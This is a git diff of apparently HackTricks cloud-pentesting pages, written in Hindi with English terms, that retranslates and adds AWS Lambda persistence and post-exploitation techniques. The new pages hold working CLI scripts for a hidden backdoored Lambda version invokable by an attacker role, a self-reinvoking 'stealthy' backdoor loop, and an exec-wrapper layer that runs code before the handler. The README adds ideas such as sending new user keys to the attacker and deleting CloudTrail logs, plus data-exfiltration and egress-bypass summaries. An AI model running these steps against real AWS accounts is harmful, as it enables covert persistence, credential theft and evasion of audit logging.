diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
index 872c679c0..9c792ae9a 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
@@ -1,4 +1,4 @@
-# AWS - Lambda Persistence
+# AWS - Lambda स्थायी पहुँच
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
@@ -10,9 +10,9 @@
 ../../aws-services/aws-lambda-enum.md
 {{#endref}}
 
-### Lambda Layer Persistence
+### Lambda Layer परसिस्टेंस
 
-यह **कोई भी कोड निष्पादित करने के लिए एक लेयर को पेश/backdoor करना** संभव है जब लैम्ब्डा को एक गुप्त तरीके से निष्पादित किया जाता है:
+यह संभव है कि आप किसी layer को **introduce/backdoor करके arbitrary code execute करने** के लिए सेट कर सकें जब Lambda stealthy तरीके से executed हो:
 
 {{#ref}}
 aws-lambda-layers-persistence.md
@@ -20,45 +20,72 @@ aws-lambda-layers-persistence.md
 
 ### Lambda Extension Persistence
 
-Lambda Layers का दुरुपयोग करते हुए, यह एक्सटेंशन का भी दुरुपयोग करना संभव है और लैम्ब्डा में स्थायी रहना, लेकिन अनुरोधों को चुराना और संशोधित करना भी संभव है।
+Lambda Layers का दुरुपयोग करके extensions का भी दुरुपयोग कर के lambda में persist करना संभव है और साथ ही requests को steal और modify भी किया जा सकता है।
 
 {{#ref}}
 aws-abusing-lambda-extensions.md
 {{#endref}}
 
-### Via resource policies
+### Resource policies के माध्यम से
 
-यह बाहरी खातों को विभिन्न लैम्ब्डा क्रियाओं (जैसे invoke या update code) तक पहुंच प्रदान करना संभव है:
+यह संभव है कि आप अलग-अलग lambda actions (जैसे invoke या update code) के लिए एक्सेस बाहरी खातों को दे सकें:
 
 <figure><img src="../../../../images/image (255).png" alt=""><figcaption></figcaption></figure>
 
 ### Versions, Aliases & Weights
 
-एक Lambda में **विभिन्न संस्करण** हो सकते हैं (प्रत्येक संस्करण के साथ अलग कोड)।\
-फिर, आप लैम्ब्डा के **विभिन्न संस्करणों के साथ विभिन्न उपनाम** बना सकते हैं और प्रत्येक को विभिन्न वजन सेट कर सकते हैं।\
-इस तरह एक हमलावर **बैकडोर संस्करण 1** और **केवल वैध कोड के साथ संस्करण 2** बना सकता है और **केवल 1%** अनुरोधों में संस्करण 1 को निष्पादित कर सकता है ताकि वह गुप्त रह सके।
+एक Lambda के पास **different versions** हो सकते हैं (हर version में अलग code हो सकता है).\
+फिर, आप Lambda के अलग-अलग versions के लिए **different aliases** बना सकते हैं और हर alias को अलग weight दे सकते हैं.\
+इस तरह attacker एक **backdoored version 1** बना सकता है और **version 2 जिसमें सिर्फ legit code हो**, और केवल अनुरोधों के 1% में ही **version 1 को execute** करके stealth बनाए रख सकता है.
 
 <figure><img src="../../../../images/image (120).png" alt=""><figcaption></figcaption></figure>
 
 ### Version Backdoor + API Gateway
 
-1. Lambda का मूल कोड कॉपी करें
-2. **मूल कोड (या केवल दुर्भावनापूर्ण कोड) को बैकडोर करते हुए एक नया संस्करण बनाएं**। उस संस्करण को प्रकाशित करें और **$LATEST पर तैनात करें**
-1. कोड निष्पादित करने के लिए लैम्ब्डा से संबंधित API गेटवे को कॉल करें
-3. **मूल कोड के साथ एक नया संस्करण बनाएं**, उस **संस्करण को प्रकाशित करें** और **$LATEST पर तैनात करें**।
-1. यह पिछले संस्करण में बैकडोर कोड को छिपा देगा
-4. API गेटवे पर जाएं और **एक नया POST विधि बनाएं** (या कोई अन्य विधि चुनें) जो लैम्ब्डा के बैकडोर संस्करण को निष्पादित करेगा: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
-1. अंतिम :1 को नोट करें जो **कार्य के संस्करण को इंगित करता है** (इस परिदृश्य में संस्करण 1 बैकडोर वाला होगा)।
-5. बनाए गए POST विधि का चयन करें और क्रियाओं में **`Deploy API`** चुनें
-6. अब, जब आप **POST के माध्यम से कार्य को कॉल करते हैं, तो आपका बैकडोर** सक्रिय होगा
+1. Lambda का original code copy करें
+2. **original code में नई version backdooring बनाएँ** (या सिर्फ malicious code के साथ). Publish करें और उस version को $LATEST पर **deploy** करें
+1. Lambda से जुड़े API gateway को कॉल करके code execute करें
+3. **original code के साथ एक नई version बनाएं**, Publish करें और उस **version** को $LATEST पर deploy करें.
+1. यह backdoored code को previous version में छिपा देगा
+4. API Gateway पर जाएँ और **create a new POST method** (या कोई और method चुनें) जो lambda के backdoored version को execute करेगा: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
+1. ARN के अंत में मौजूद :1 पर ध्यान दें जो **function का version दर्शाता है** (इस scenario में version 1 backdoored होगा).
+5. बने हुए POST method को select करें और Actions में **`Deploy API`** चुनें
+6. अब, जब आप POST के माध्यम से function को कॉल करेंगे तो आपका Backdoor invoke होगा
 
 ### Cron/Event actuator
 
-यह तथ्य कि आप **जब कुछ होता है या जब कुछ समय बीतता है तब लैम्ब्डा कार्यों को चलाने** के लिए बना सकते हैं, लैम्ब्डा को स्थायीता प्राप्त करने और पहचान से बचने का एक अच्छा और सामान्य तरीका बनाता है।\
-यहां आपके **AWS में अधिक गुप्तता से रहने के लिए लैम्ब्डा बनाने के कुछ विचार हैं**।
+यह कि आप **lambda functions को किसी घटना होने पर या समय के आधार पर चलवा सकते हैं** Lambda को persistence प्राप्त करने और detection से बचने का एक आसान और आम तरीका बनाता है.\
+यहाँ कुछ विचार दिए गए हैं ताकि आप AWS में अपनी **presence को अधिक stealthy बनाने के लिए lambdas** बना सकें.
+
+- हर बार जब नया user बनाया जाता है, lambda एक नया user key generate करता है और attacker को भेज देता है.
+- हर बार जब नया role बनाया जाता है, lambda compromised users को assume role permissions दे देता है.
+- हर बार जब नए cloudtrail logs उत्पन्न होते हैं, उन्हें delete/alter कर दें
+
+### RCE abusing AWS_LAMBDA_EXEC_WRAPPER + Lambda Layers
+
+Environment variable `AWS_LAMBDA_EXEC_WRAPPER` का दुरुपयोग करके runtime/handler शुरू होने से पहले attacker-controlled wrapper script चलाया जा सकता है. Wrapper को एक Lambda Layer के माध्यम से `/opt/bin/htwrap` पर deliver करें, `AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap` सेट करें, और फिर function invoke करें. Wrapper function runtime process के अंदर चलता है, function execution role को inherit करता है, और अंत में `exec`s असली runtime को ताकि original handler सामान्य रूप से execute हो सके।
+
+{{#ref}}
+aws-lambda-exec-wrapper-persistence.md
+{{#endref}}
+
+### AWS - Lambda Function URL Public Exposure
+
+Lambda asynchronous destinations और Recursion configuration का दुरुपयोग करके आप एक function को बिना किसी external scheduler (जैसे EventBridge, cron, आदि) के लगातार खुद को re-invoke करवा सकते हैं. डिफ़ॉल्ट रूप से, Lambda recursive loops को terminate कर देता है, लेकिन recursion config को Allow पर सेट करने से वे पुनः सक्षम हो जाते हैं. Destinations async invokes के लिए सर्विस-साइड पर delivery करते हैं, इसलिए एक single seed invoke एक stealthy, code-free heartbeat/backdoor चैनल बना देता है. शोर कम रखने के लिए reserved concurrency से optional throttle कर सकते हैं.
+
+{{#ref}}
+aws-lambda-async-self-loop-persistence.md
+{{#endref}}
+
+### AWS - Lambda Alias-Scoped Resource Policy Backdoor
+
+एक hidden Lambda version बनाएं जिसमें attacker logic हो और `lambda add-permission` में `--qualifier` parameter का उपयोग करके resource-based policy को उस specific version (या alias) तक scope करें. Attacker principal को केवल `lambda:InvokeFunction` पर `arn:aws:lambda:REGION:ACCT:function:FN:VERSION` की अनुमति दें. Function name या primary alias के माध्यम से सामान्य invocations अप्रभावित रहते हैं, जबकि attacker सीधे backdoored version का ARN invoke कर सकता है.
+
+यह Function URL को expose करने की तुलना में अधिक stealthy है और primary traffic alias को बदलता नहीं है.
+
+{{#ref}}
+aws-lambda-alias-version-policy-backdoor.md
+{{#endref}}
 
-- हर बार जब एक नया उपयोगकर्ता बनाया जाता है, तो लैम्ब्डा एक नया उपयोगकर्ता कुंजी उत्पन्न करता है और इसे हमलावर को भेजता है।
-- हर बार जब एक नई भूमिका बनाई जाती है, तो लैम्ब्डा समझौता किए गए उपयोगकर्ताओं को भूमिका मानने की अनुमति देता है।
-- हर बार जब नए क्लाउडट्रेल लॉग उत्पन्न होते हैं, तो उन्हें हटा दें/संशोधित करें
 
 {{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-alias-version-policy-backdoor.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-alias-version-policy-backdoor.md
new file mode 100644
index 000000000..be461e021
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-alias-version-policy-backdoor.md
@@ -0,0 +1,88 @@
+# AWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## सारांश
+
+हमलावर लॉजिक के साथ एक छुपी हुई Lambda version बनाएं और `lambda add-permission` में `--qualifier` पैरामीटर का उपयोग करके resource-based policy को उस विशिष्ट version (या alias) तक सीमित करें। केवल `lambda:InvokeFunction` को `arn:aws:lambda:REGION:ACCT:function:FN:VERSION` पर एक हमलावर principal को दें। फ़ंक्शन नाम या मुख्य alias के माध्यम से सामान्य invocations अप्रभावित रहते हैं, जबकि हमलावर सीधे backdoored version ARN को invoke कर सकता है।
+
+यह Function URL को एक्सपोज़ करने की तुलना में अधिक stealthier है और प्राथमिक ट्रैफिक alias को बदलता नहीं है।
+
+## आवश्यक अनुमतियाँ (हमलावर)
+
+- `lambda:UpdateFunctionCode`, `lambda:UpdateFunctionConfiguration`, `lambda:PublishVersion`, `lambda:GetFunctionConfiguration`
+- `lambda:AddPermission` (to add version-scoped resource policy)
+- `iam:CreateRole`, `iam:PutRolePolicy`, `iam:GetRole`, `sts:AssumeRole` (हमलावर principal का अनुकरण करने के लिए)
+
+## हमले के चरण (CLI)
+
+<details>
+<summary>छुपा हुआ version प्रकाशित करें, qualifier-स्कोप्ड permission जोड़ें, हमलावर के रूप में invoke करें</summary>
+```bash
+# Vars
+REGION=us-east-1
+TARGET_FN=<target-lambda-name>
+
+# [Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., "main") stays on a clean version
+# aws lambda create-alias --function-name "$TARGET_FN" --name main --function-version <clean-version> --region "$REGION"
+
+# 1) Build a small backdoor handler and publish as a new version
+cat > bdoor.py <<PY
+import json, os, boto3
+
+def lambda_handler(e, c):
+ident = boto3.client(sts).get_caller_identity()
+return {"ht": True, "who": ident, "env": {"fn": os.getenv(AWS_LAMBDA_FUNCTION_NAME)}}
+PY
+zip bdoor.zip bdoor.py
+aws lambda update-function-code --function-name "$TARGET_FN" --zip-file fileb://bdoor.zip --region $REGION
+aws lambda update-function-configuration --function-name "$TARGET_FN" --handler bdoor.lambda_handler --region $REGION
+until [ "$(aws lambda get-function-configuration --function-name "$TARGET_FN" --region $REGION --query LastUpdateStatus --output text)" = "Successful" ]; do sleep 2; done
+VER=$(aws lambda publish-version --function-name "$TARGET_FN" --region $REGION --query Version --output text)
+VER_ARN=$(aws lambda get-function --function-name "$TARGET_FN:$VER" --region $REGION --query Configuration.FunctionArn --output text)
+echo "Published version: $VER ($VER_ARN)"
+
+# 2) Create an attacker principal and allow only version invocation (same-account simulation)
+ATTACK_ROLE_NAME=ht-version-invoker
+aws iam create-role --role-name $ATTACK_ROLE_NAME --assume-role-policy-document Version:2012-10-17 >/dev/null
+cat > /tmp/invoke-policy.json <<POL
+{
+"Version": "2012-10-17",
+"Statement": [{
+"Effect": "Allow",
+"Action": ["lambda:InvokeFunction"],
+"Resource": ["$VER_ARN"]
+}]
+}
+POL
+aws iam put-role-policy --role-name $ATTACK_ROLE_NAME --policy-name ht-invoke-version --policy-document file:///tmp/invoke-policy.json
+
+# Add resource-based policy scoped to the version (Qualifier)
+aws lambda add-permission \
+--function-name "$TARGET_FN" \
+--qualifier "$VER" \
+--statement-id ht-version-backdoor \
+--action lambda:InvokeFunction \
+--principal arn:aws:iam::$(aws sts get-caller-identity --query Account --output text):role/$ATTACK_ROLE_NAME \
+--region $REGION
+
+# 3) Assume the attacker role and invoke only the qualified version
+ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity --query Account --output text):role/$ATTACK_ROLE_NAME
+CREDS=$(aws sts assume-role --role-arn "$ATTACK_ROLE_ARN" --role-session-name htInvoke --query Credentials --output json)
+export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId)
+export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey)
+export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken)
+aws lambda invoke --function-name "$VER_ARN" /tmp/ver-out.json --region $REGION >/dev/null
+cat /tmp/ver-out.json
+
+# 4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role
+aws lambda remove-permission --function-name "$TARGET_FN" --statement-id ht-version-backdoor --qualifier "$VER" --region $REGION || true
+```
+</details>
+
+## प्रभाव
+
+- एक stealthy backdoor प्रदान करता है जो primary alias को संशोधित किए बिना या Function URL को उजागर किए बिना फ़ंक्शन के छिपे हुए version को invoke करने की अनुमति देता है।
+- resource-based policy `Qualifier` के माध्यम से exposure को केवल निर्दिष्ट version/alias तक सीमित करता है, जिससे detection surface घटती है जबकि attacker principal के लिए reliable invocation बरकरार रहती है।
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-async-self-loop-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-async-self-loop-persistence.md
new file mode 100644
index 000000000..5a887281e
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-async-self-loop-persistence.md
@@ -0,0 +1,92 @@
+# AWS - Lambda Async Self-Loop Persistence via Destinations + Recursion Allow
+
+Abuse Lambda asynchronous destinations को Recursion configuration के साथ मिलाकर एक function को बिना किसी external scheduler (no EventBridge, cron, etc.) के लगातार खुद को re-invoke करने के लिए मजबूर करें। By default, Lambda recursive loops को terminate कर देता है, लेकिन Recursion config को Allow पर सेट करने से वे फिर से सक्षम हो जाते हैं। Destinations service side पर async invokes के लिए deliver करते हैं, इसलिए एक single seed invoke एक stealthy, code-free heartbeat/backdoor channel बना देता है। Optionally reserved concurrency के साथ throttle करके noise कम रखें।
+
+Notes
+- Lambda सीधे किसी function को उसका अपना destination सेट करने की अनुमति नहीं देता। destination के रूप में एक function alias का उपयोग करें और execution role को उस alias को invoke करने की अनुमति दें।
+- Minimum permissions: target function के event invoke config और Recursion config को पढ़ने/अपडेट करने की क्षमता, एक version publish करने और alias manage करने की क्षमता, और function के execution role policy को अपडेट करने की क्षमता ताकि alias पर lambda:InvokeFunction की अनुमति दी जा सके।
+
+## Requirements
+- Region: us-east-1
+- Vars:
+- REGION=us-east-1
+- TARGET_FN=<target-lambda-name>
+
+## Steps
+
+1) फ़ंक्शन ARN और वर्तमान Recursion सेटिंग प्राप्त करें
+```
+FN_ARN=$(aws lambda get-function --function-name "$TARGET_FN" --region $REGION --query Configuration.FunctionArn --output text)
+aws lambda get-function-recursion-config --function-name "$TARGET_FN" --region $REGION || true
+```
+2) एक version प्रकाशित करें और एक alias बनाएं/अपडेट करें (self destination के रूप में उपयोग किया जाता है)
+```
+VER=$(aws lambda publish-version --function-name "$TARGET_FN" --region $REGION --query Version --output text)
+if ! aws lambda get-alias --function-name "$TARGET_FN" --name loop --region $REGION >/dev/null 2>&1; then
+aws lambda create-alias --function-name "$TARGET_FN" --name loop --function-version "$VER" --region $REGION
+else
+aws lambda update-alias --function-name "$TARGET_FN" --name loop --function-version "$VER" --region $REGION
+fi
+ALIAS_ARN=$(aws lambda get-alias --function-name "$TARGET_FN" --name loop --region $REGION --query AliasArn --output text)
+```
+3) function execution role को alias invoke करने की अनुमति दें (Lambda Destinations→Lambda के लिए आवश्यक)
+```
+# Set this to the execution role name used by the target function
+ROLE_NAME=<lambda-execution-role-name>
+cat > /tmp/invoke-self-policy.json <<EOF
+{
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": "lambda:InvokeFunction",
+"Resource": "${ALIAS_ARN}"
+}
+]
+}
+EOF
+aws iam put-role-policy --role-name "$ROLE_NAME" --policy-name allow-invoke-self --policy-document file:///tmp/invoke-self-policy.json --region $REGION
+```
+4) async destination को alias पर कॉन्फ़िगर करें (self via alias) और retries अक्षम करें
+```
+aws lambda put-function-event-invoke-config \
+--function-name "$TARGET_FN" \
+--destination-config OnSuccess={Destination=$ALIAS_ARN} \
+--maximum-retry-attempts 0 \
+--region $REGION
+
+# Verify
+aws lambda get-function-event-invoke-config --function-name "$TARGET_FN" --region $REGION --query DestinationConfig
+```
+5) पुनरावर्ती लूपों की अनुमति दें
+```
+aws lambda put-function-recursion-config --function-name "$TARGET_FN" --recursive-loop Allow --region $REGION
+aws lambda get-function-recursion-config --function-name "$TARGET_FN" --region $REGION
+```
+6) एक एकल asynchronous invoke आरंभ करें
+```
+aws lambda invoke --function-name "$TARGET_FN" --invocation-type Event /tmp/seed.json --region $REGION >/dev/null
+```
+7) निरंतर invocations का निरीक्षण (उदाहरण)
+```
+# Recent logs (if the function logs each run)
+aws logs filter-log-events --log-group-name "/aws/lambda/$TARGET_FN" --limit 20 --region $REGION --query events[].timestamp --output text
+# or check CloudWatch Metrics for Invocations increasing
+```
+8) वैकल्पिक stealth थ्रॉटल
+```
+aws lambda put-function-concurrency --function-name "$TARGET_FN" --reserved-concurrent-executions 1 --region $REGION
+```
+## साफ़-सफाई
+लूप को तोड़ें और persistence हटाएं।
+```
+aws lambda put-function-recursion-config --function-name "$TARGET_FN" --recursive-loop Terminate --region $REGION
+aws lambda delete-function-event-invoke-config --function-name "$TARGET_FN" --region $REGION || true
+aws lambda delete-function-concurrency --function-name "$TARGET_FN" --region $REGION || true
+# Optional: delete alias and remove the inline policy when finished
+aws lambda delete-alias --function-name "$TARGET_FN" --name loop --region $REGION || true
+ROLE_NAME=<lambda-execution-role-name>
+aws iam delete-role-policy --role-name "$ROLE_NAME" --policy-name allow-invoke-self --region $REGION || true
+```
+## प्रभाव
+- एकल async invoke बिना किसी external scheduler के Lambda को लगातार स्वयं को फिर से कॉल करने के लिए प्रेरित करता है, जिससे छिपा हुआ persistence/heartbeat सक्षम होता है। Reserved concurrency शोर को एकल warm execution तक सीमित कर सकता है।
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-exec-wrapper-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-exec-wrapper-persistence.md
new file mode 100644
index 000000000..9a3acb453
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-exec-wrapper-persistence.md
@@ -0,0 +1,94 @@
+# AWS - Lambda Exec Wrapper Layer Hijack (Pre-Handler RCE)
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## सारांश
+
+`AWS_LAMBDA_EXEC_WRAPPER` environment variable का दुरुपयोग करें ताकि runtime/handler शुरू होने से पहले हमलावर-नियंत्रित wrapper script चल सके। Wrapper को एक Lambda Layer में `/opt/bin/htwrap` पर वितरित करें, `AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap` सेट करें, और फिर function को invoke करें। Wrapper function के runtime process के अंदर चलता है, function execution role को inherit करता है, और अंत में वास्तविक runtime को `exec` करके मूल handler सामान्य रूप से चलता रहे ऐसा सुनिश्चित करता है।
+
+> [!WARNING]
+> यह तकनीक लक्षित Lambda में code execution देती है बिना उसके source code या role को बदले और बिना `iam:PassRole` की आवश्यकता के। आपको केवल function configuration अपडेट करने और एक layer प्रकाशित/जोड़ने की क्षमता चाहिए।
+
+## आवश्यक अनुमतियाँ (attacker)
+
+- `lambda:UpdateFunctionConfiguration`
+- `lambda:GetFunctionConfiguration`
+- `lambda:InvokeFunction` (or trigger via existing event)
+- `lambda:ListFunctions`, `lambda:ListLayers`
+- `lambda:PublishLayerVersion` (same account) and optionally `lambda:AddLayerVersionPermission` if using a cross-account/public layer
+
+## Wrapper Script
+
+Wrapper को layer में `/opt/bin/htwrap` पर रखें। यह pre-handler logic चला सकता है और वास्तविक runtime से चेन करने के लिए अंत में `exec "$@"` होना चाहिए।
+```bash
+#!/bin/bash
+set -euo pipefail
+# Pre-handler actions (runs in runtime process context)
+echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
+python3 - <<'PY'
+import boto3, json, os
+try:
+ident = boto3.client('sts').get_caller_identity()
+print('[ht] sts identity:', json.dumps(ident))
+except Exception as e:
+print('[ht] sts error:', e)
+PY
+# Chain to the real runtime
+exec "$@"
+```
+## हमले के चरण (CLI)
+
+<details>
+<summary>लेयर प्रकाशित करें, लक्षित फ़ंक्शन से जोड़ें, wrapper सेट करें, invoke करें</summary>
+```bash
+# Vars
+REGION=us-east-1
+TARGET_FN=<target-lambda-name>
+
+# 1) Package wrapper at /opt/bin/htwrap
+mkdir -p layer/bin
+cat > layer/bin/htwrap <<'WRAP'
+#!/bin/bash
+set -euo pipefail
+echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
+python3 - <<'PY'
+import boto3, json
+print('[ht] sts identity:', __import__('json').dumps(__import__('boto3').client('sts').get_caller_identity()))
+PY
+exec "$@"
+WRAP
+chmod +x layer/bin/htwrap
+(zip -qr htwrap-layer.zip layer)
+
+# 2) Publish the layer
+LAYER_ARN=$(aws lambda publish-layer-version \
+--layer-name ht-exec-wrapper \
+--zip-file fileb://htwrap-layer.zip \
+--compatible-runtimes python3.11 python3.10 python3.9 nodejs20.x nodejs18.x java21 java17 dotnet8 \
+--query LayerVersionArn --output text --region "$REGION")
+
+echo "$LAYER_ARN"
+
+# 3) Attach the layer and set AWS_LAMBDA_EXEC_WRAPPER
+aws lambda update-function-configuration \
+--function-name "$TARGET_FN" \
+--layers "$LAYER_ARN" \
+--environment "Variables={AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap}" \
+--region "$REGION"
+
+# Wait for update to finish
+until [ "$(aws lambda get-function-configuration --function-name "$TARGET_FN" --query LastUpdateStatus --output text --region "$REGION")" = "Successful" ]; do sleep 2; done
+
+# 4) Invoke and verify via CloudWatch Logs
+aws lambda invoke --function-name "$TARGET_FN" /tmp/out.json --region "$REGION" >/dev/null
+aws logs filter-log-events --log-group-name "/aws/lambda/$TARGET_FN" --limit 50 --region "$REGION" --query 'events[].message' --output text
+```
+</details>
+
+## प्रभाव
+
+- फ़ंक्शन के मौजूदा execution role का उपयोग करते हुए Lambda runtime संदर्भ में handler से पहले कोड निष्पादन।
+- फ़ंक्शन कोड या role में कोई परिवर्तन आवश्यक नहीं; सामान्य managed runtimes (Python, Node.js, Java, .NET) पर काम करता है।
+- handler चलने से पहले persistence, credential access (e.g., STS), data exfiltration और runtime tampering सक्षम करता है।
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
index 819808b26..6722bfc14 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
@@ -4,32 +4,82 @@
 
 ## Lambda
 
-अधिक जानकारी के लिए देखें:
+For more information check:
 
 {{#ref}}
 ../../aws-services/aws-lambda-enum.md
 {{#endref}}
 
-### Lambda क्रेडेंशियल्स को एक्सफिल्ट्रेट करें
+### Exfilrtate Lambda Credentials
 
-Lambda रनटाइम पर क्रेडेंशियल्स को इंजेक्ट करने के लिए पर्यावरण चर का उपयोग करता है। यदि आप उन्हें एक्सेस प्राप्त कर सकते हैं (जैसे `/proc/self/environ` को पढ़कर या स्वयं कमजोर फ़ंक्शन का उपयोग करके), तो आप उनका उपयोग कर सकते हैं। ये डिफ़ॉल्ट चर नाम `AWS_SESSION_TOKEN`, `AWS_SECRET_ACCESS_KEY`, और `AWS_ACCESS_KEY_ID` में रहते हैं।
+Lambda runtime पर credentials inject करने के लिए environment variables का उपयोग करता है। अगर आप उन्हें access कर सकें (जैसे `/proc/self/environ` पढ़कर या vulnerable function का खुद इस्तेमाल करके), तो आप उन्हें खुद इस्तेमाल कर सकते हैं। ये default variable names `AWS_SESSION_TOKEN`, `AWS_SECRET_ACCESS_KEY`, और `AWS_ACCESS_KEY_ID` में रहते हैं।
 
-डिफ़ॉल्ट रूप से, इनका क्लाउडवॉच लॉग समूह (जिसका नाम `AWS_LAMBDA_LOG_GROUP_NAME` में संग्रहीत है) में लिखने का अधिकार होगा, साथ ही मनचाहे लॉग समूह बनाने का भी, हालाँकि Lambda फ़ंक्शंस अक्सर उनके इच्छित उपयोग के आधार पर अधिक अनुमतियाँ प्राप्त करते हैं।
+डिफ़ॉल्ट रूप से, इनको cloudwatch log group में लिखने की access होगी (जिसका नाम `AWS_LAMBDA_LOG_GROUP_NAME` में स्टोर होता है), और arbitrary log groups बनाने की भी, हालांकि Lambda functions अक्सर उनके intended use के आधार पर और permissions भी रखते हैं।
 
-### दूसरों के Lambda URL अनुरोध चुराएं
+### Steal Others Lambda URL Requests
 
-यदि एक हमलावर किसी तरह Lambda के अंदर RCE प्राप्त करने में सफल हो जाता है, तो वह अन्य उपयोगकर्ताओं के HTTP अनुरोधों को Lambda के लिए चुरा सकेगा। यदि अनुरोधों में संवेदनशील जानकारी (कुकीज़, क्रेडेंशियल्स...) होती है, तो वह उन्हें चुरा सकेगा।
+अगर attacker किसी तरह Lambda के अंदर RCE हासिल कर लेता है तो वह अन्य users के HTTP requests जो Lambda को भेजे जाते हैं, चुरा सकता है। अगर उन requests में sensitive जानकारी (cookies, credentials...) हो, तो वह उन्हें चुरा सकेगा।
 
 {{#ref}}
 aws-warm-lambda-persistence.md
 {{#endref}}
 
-### दूसरों के Lambda URL अनुरोध और एक्सटेंशन अनुरोध चुराएं
+### Steal Others Lambda URL Requests & Extensions Requests
 
-Lambda लेयर्स का दुरुपयोग करते हुए एक्सटेंशन का दुरुपयोग करना और Lambda में स्थायी रहना संभव है, लेकिन अनुरोधों को चुराना और संशोधित करना भी संभव है।
+Lambda Layers का दुरुपयोग करके extensions का भी दुरुपयोग कर के Lambda में persist करना, और साथ ही requests को चुराना और बदलना भी संभव है।
 
 {{#ref}}
 ../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
 {{#endref}}
 
+### AWS Lambda – VPC Egress Bypass
+
+एक empty VpcConfig (SubnetIds=[], SecurityGroupIds=[]) के साथ configuration अपडेट करके एक Lambda function को restricted VPC से बाहर मजबूर कर दें। फिर function Lambda-managed networking plane में चलेगा, और outbound internet access वापस पा लेगा, जिससे private VPC subnets द्वारा लगाए गए egress controls (बिना NAT के) bypass हो जाएंगे।
+
+{{#ref}}
+aws-lambda-vpc-egress-bypass.md
+{{#endref}}
+
+### AWS Lambda – Runtime Pinning/Rollback Abuse
+
+`lambda:PutRuntimeManagementConfig` का दुरुपयोग करके किसी function को एक specific runtime version (Manual) पर pin करें या updates को freeze करें (FunctionUpdate)। इससे malicious layers/wrappers के साथ compatibility बनी रहेगी और function को एक outdated, vulnerable runtime पर रखा जा सकता है ताकि exploitation और long-term persistence में मदद मिल सके।
+
+{{#ref}}
+aws-lambda-runtime-pinning-abuse.md
+{{#endref}}
+
+### AWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
+
+`lambda:UpdateFunctionConfiguration` के advanced logging controls का दुरुपयोग करके किसी function के logs को attacker-चुने हुए CloudWatch Logs log group में redirect किया जा सकता है। यह code या execution role बदले बिना काम करता है (most Lambda roles में पहले से `logs:CreateLogGroup/CreateLogStream/PutLogEvents` शामिल होते हैं via `AWSLambdaBasicExecutionRole`)। अगर function secrets/request bodies प्रिंट करता है या stack traces के साथ crash होता है, तो आप उन्हें नए log group से इकट्ठा कर सकते हैं।
+
+{{#ref}}
+aws-lambda-loggingconfig-redirection.md
+{{#endref}}
+
+### AWS - Lambda Function URL Public Exposure
+
+Function URL AuthType को NONE पर सेट करके और एक resource-based policy attach करके जो lambda:InvokeFunctionUrl को सभी को देता है, किसी private Lambda Function URL को public unauthenticated endpoint में बदला जा सकता है। इससे internal functions की anonymous invocation संभव हो जाती है और sensitive backend operations expose हो सकते हैं।
+
+{{#ref}}
+aws-lambda-function-url-public-exposure.md
+{{#endref}}
+
+### AWS Lambda – Event Source Mapping Target Hijack
+
+`UpdateEventSourceMapping` का दुरुपयोग करके existing Event Source Mapping (ESM) के target Lambda function को बदल दें ताकि DynamoDB Streams, Kinesis, या SQS के records attacker-controlled function को डिलीवर हों। यह producers या original function code को छुए बिना live data को silently divert कर देता है।
+
+{{#ref}}
+aws-lambda-event-source-mapping-target-hijack.md
+{{#endref}}
+
+### AWS Lambda – EFS Mount Injection data exfiltration
+
+`lambda:UpdateFunctionConfiguration` का दुरुपयोग करके किसी existing EFS Access Point को Lambda से attach करें, फिर ऐसे trivial code deploy करें जो mounted path से files list/read करे ताकि function पहले जिन तक पहुँच नहीं था वे shared secrets/config exfiltrate किए जा सकें।
+
+{{#ref}}
+aws-lambda-efs-mount-injection.md
+{{#endref}}
